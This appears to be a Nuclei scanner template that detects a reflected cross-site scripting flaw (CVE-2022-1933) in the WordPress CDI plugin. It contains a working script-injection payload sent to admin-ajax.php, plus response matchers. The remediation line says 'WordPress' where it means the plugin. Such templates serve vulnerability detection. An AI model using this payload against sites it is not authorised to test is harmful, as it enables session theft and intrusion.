57 lines
2.5 KiB
YAML
57 lines
2.5 KiB
YAML
id: CVE-2022-1933
|
|
|
|
info:
|
|
name: WordPress CDI <5.1.9 - Cross Site Scripting
|
|
author: Akincibor
|
|
severity: medium
|
|
description: |
|
|
WordPress CDI plugin prior to 5.1.9 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
|
|
remediation: |
|
|
Upgrade WordPress to version 5.1.9 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/6cedb27f-6140-4cba-836f-63de98e521bf
|
|
- https://wordpress.org/plugins/collect-and-deliver-interface-for-woocommerce/advanced/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1933
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-1933
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00086
|
|
epss-percentile: 0.35299
|
|
cpe: cpe:2.3:a:collect_and_deliver_interface_for_woocommerce_project:collect_and_deliver_interface_for_woocommerce:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: collect_and_deliver_interface_for_woocommerce_project
|
|
product: collect_and_deliver_interface_for_woocommerce
|
|
framework: wordpress
|
|
tags: cve,cve2022,cdi,wpscan,wp-plugin,wp,wordpress,xss,collect_and_deliver_interface_for_woocommerce_project
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<script>alert(document.domain)</script>'
|
|
- 'Tracking code not correct'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100f3198ed8648533f261c7937fadda12116fdb8b77664d2d691c33fb3c46b0a0df022100de2c1714ae9f8faf59a0c5e2a22080bc6e9f94aa19f7acd5b62f3c0b3e2f4033:922c64590222798bb761d5b6d8e72950 |